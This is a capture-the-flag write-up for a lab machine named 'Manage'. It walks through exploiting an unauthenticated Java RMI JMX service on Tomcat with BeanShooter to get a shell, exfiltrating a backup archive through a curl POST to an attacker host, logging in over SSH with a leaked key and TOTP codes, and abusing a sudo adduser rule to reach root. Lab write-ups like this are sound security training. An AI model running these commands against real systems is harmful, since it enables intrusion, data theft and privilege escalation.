Skip to main content

Machine (Easy) - Manage

Writeup for the Manage machine, an easy-level Linux box focused on exploiting an unauthenticated Java RMI JMX endpoint on Apache Tomcat to gain shell access and escalate privileges.

Writeup Author: BobBuilder

Objective: Exploit an unauthenticated Java RMI JMX endpoint on Apache Tomcat to gain shell access, extract credentials, and escalate to root via sudo misconfiguration.

Category Difficulty Platform Machine Author
Machine Easy Linux fume & xct

Enumeration

nmap -sV -p- <manage_ip>
  • 22/tcp – OpenSSH 8.9p1 (Ubuntu)
  • 8080/tcp – Apache Tomcat 10.1.19
  • 2222/tcp, 42435/tcp – Java RMI endpoints
  • 33499/tcp – tcpwrapped

User

RMI Enumeration

We use BeanShooter to enumerate and interact with Java RMI endpoints on port 2222:

java -jar beanshooter-4.1.0-jar-with-dependencies.jar enum <manage_ip> 2222
  • Discovered an exposed jmxrmi JMX interface with no authentication.
  • Enumerated internal Tomcat credentials:
    • manager : <REDACTED>
    • admin : <REDACTED>

This confirms the RMI service can be abused for remote interaction with the Tomcat server.

Remote Code Execution via BeanShooter

We leverage the exposed JMX service to deploy and execute a payload:

java -jar beanshooter-4.1.0-jar-with-dependencies.jar standard <manage_ip> 2222 tonka
java -jar beanshooter-4.1.0-jar-with-dependencies.jar tonka shell <manage_ip> 2222
  • The first command sets up the payload class.
  • The second command spawns an interactive shell.
  • We gain a shell as tomcat: 
    uid=1001(tomcat) gid=1001(tomcat)

File Extraction

Inside the Tomcat environment, we locate and exfiltrate a compressed backup containing sensitive files:

curl -X POST http://<attacker_ip>/upload -F 'files=@backup.tar.gz' --insecure
  • From the archive:
    • Extracted an OpenSSH private key (id_ed25519)
    • Found a .google_authenticator file with valid TOTP secrets and pre-generated codes

This provides everything needed for SSH-based access and bypassing 2FA.

SSH Access

We authenticate using the extracted SSH private key and bypass the TOTP prompt using one of the leaked codes:

ssh -i id_ed25519 useradmin@<manage_ip>
  • Successfully log in as useradmin.

Root

Sudo Permissions

We see useradmin can run adduser without a password with a regex restriction.

sudo -l

(ALL : ALL) NOPASSWD: /usr/sbin/adduser ^[a-zA-Z0-9]+$

This allows us to create any new user with alphanumeric usernames.

Privilege Escalation

User admin

The /etc/sudoers file shows that any user in the admin group has full sudo access:

%admin ALL=(ALL) ALL

Adding the admin user

sudo /usr/sbin/adduser admin
  • The newly created admin user is automatically added to the admin group.
  • This allows us to escalate to root with sudo su.
su admin
sudo su
Back to top